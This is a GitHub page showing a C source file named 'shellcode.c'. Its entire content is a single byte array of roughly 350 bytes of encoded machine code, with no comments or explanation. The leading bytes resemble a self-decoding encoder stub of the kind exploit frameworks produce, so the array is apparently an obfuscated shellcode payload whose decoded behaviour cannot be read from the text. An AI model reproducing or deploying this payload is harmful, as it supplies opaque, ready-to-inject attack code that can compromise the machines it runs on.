-
Notifications
You must be signed in to change notification settings - Fork 10
Expand file tree
/
Copy pathshellcode.c
More file actions
25 lines (25 loc) · 1.46 KB
/
shellcode.c
File metadata and controls
25 lines (25 loc) · 1.46 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
unsigned char buf[] =
"\xbe\xe3\x09\x28\x46\xda\xc1\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x31\x72\x12\x03\x72\x12\x83\x09\xf5\xca\xb3\x31\xee\x89"
"\x3c\xc9\xef\xed\xb5\x2c\xde\x2d\xa1\x25\x71\x9e\xa1\x6b\x7e"
"\x55\xe7\x9f\xf5\x1b\x20\x90\xbe\x96\x16\x9f\x3f\x8a\x6b\xbe"
"\xc3\xd1\xbf\x60\xfd\x19\xb2\x61\x3a\x47\x3f\x33\x93\x03\x92"
"\xa3\x90\x5e\x2f\x48\xea\x4f\x37\xad\xbb\x6e\x16\x60\xb7\x28"
"\xb8\x83\x14\x41\xf1\x9b\x79\x6c\x4b\x10\x49\x1a\x4a\xf0\x83"
"\xe3\xe1\x3d\x2c\x16\xfb\x7a\x8b\xc9\x8e\x72\xef\x74\x89\x41"
"\x8d\xa2\x1c\x51\x35\x20\x86\xbd\xc7\xe5\x51\x36\xcb\x42\x15"
"\x10\xc8\x55\xfa\x2b\xf4\xde\xfd\xfb\x7c\xa4\xd9\xdf\x25\x7e"
"\x43\x46\x80\xd1\x7c\x98\x6b\x8d\xd8\xd3\x86\xda\x50\xbe\xce"
"\x2f\x59\x40\x0f\x38\xea\x33\x3d\xe7\x40\xdb\x0d\x60\x4f\x1c"
"\x71\x5b\x37\xb2\x8c\x64\x48\x9b\x4a\x30\x18\xb3\x7b\x39\xf3"
"\x43\x83\xec\x54\x13\x2b\x5f\x15\xc3\x8b\x0f\xfd\x09\x04\x6f"
"\x1d\x32\xce\x18\xb4\xc9\x99\x2c\x42\xd1\x74\x59\x56\xd1\x87"
"\x22\xdf\x37\xed\x44\xb6\xe0\x9a\xfd\x93\x7a\x3a\x01\x0e\x07"
"\x7c\x89\xbd\xf8\x33\x7a\xcb\xea\xa4\x8a\x86\x50\x62\x94\x3c"
"\xfc\xe8\x07\xdb\xfc\x67\x34\x74\xab\x20\x8a\x8d\x39\xdd\xb5"
"\x27\x5f\x1c\x23\x0f\xdb\xfb\x90\x8e\xe2\x8e\xad\xb4\xf4\x56"
"\x2d\xf1\xa0\x06\x78\xaf\x1e\xe1\xd2\x01\xc8\xbb\x89\xcb\x9c"
"\x3a\xe2\xcb\xda\x42\x2f\xba\x02\xf2\x86\xfb\x3d\x3b\x4f\x0c"
"\x46\x21\xef\xf3\x9d\xe1\x1f\xbe\xbf\x40\x88\x67\x2a\xd1\xd5"
"\x97\x81\x16\xe0\x1b\x23\xe7\x17\x03\x46\xe2\x5c\x83\xbb\x9e"
"\xcd\x66\xbb\x0d\xed\xa2";